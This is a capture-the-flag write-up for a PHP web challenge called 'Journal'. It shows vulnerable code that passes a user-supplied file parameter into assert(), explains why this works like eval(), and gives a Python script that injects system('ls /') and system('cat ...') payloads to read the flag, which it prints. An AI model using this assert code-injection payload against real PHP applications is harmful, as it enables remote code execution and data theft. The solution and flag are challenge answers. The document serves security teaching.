Web - Journal
100 points | 518 solves
Description
dear diary, there is no LFI in this app
Downloads
Solution
The provided php file:
<?php
echo "<p>Welcome to my journal app!</p>";
echo "<p><a href=/?file=file1.txt>file1.txt</a></p>";
echo "<p><a href=/?file=file2.txt>file2.txt</a></p>";
echo "<p><a href=/?file=file3.txt>file3.txt</a></p>";
echo "<p><a href=/?file=file4.txt>file4.txt</a></p>";
echo "<p><a href=/?file=file5.txt>file5.txt</a></p>";
echo "<p>";
if (isset($_GET['file'])) {
$file = $_GET['file'];
$filepath = './files/' . $file;
assert("strpos('$file', '..') === false") or die("Invalid file!");
if (file_exists($filepath)) {
include($filepath);
} else {
echo 'File not found!';
}
}
echo "</p>";It's a simple enough challenge that looks like your typical LFI but like the description says, this is not a LFI challenge.
As it turns out, the assert() function basically works like an eval() function and we all know the horrors of eval. This page on HackTricks explains it all.
It is also worth noting from the provided docker file that the flag file name is appended with random characters which hinted towards getting an RCE.
Final solution:
import requests
import urllib.parse
payload = urllib.parse.quote_plus("'.die(system('ls /')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)
payload = urllib.parse.quote_plus("'.die(system('cat /flag-cARdaInFg6dD10uWQQgm.txt')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)Flag: ictf{assertion_failed_e3106922feb13b10}
Last updated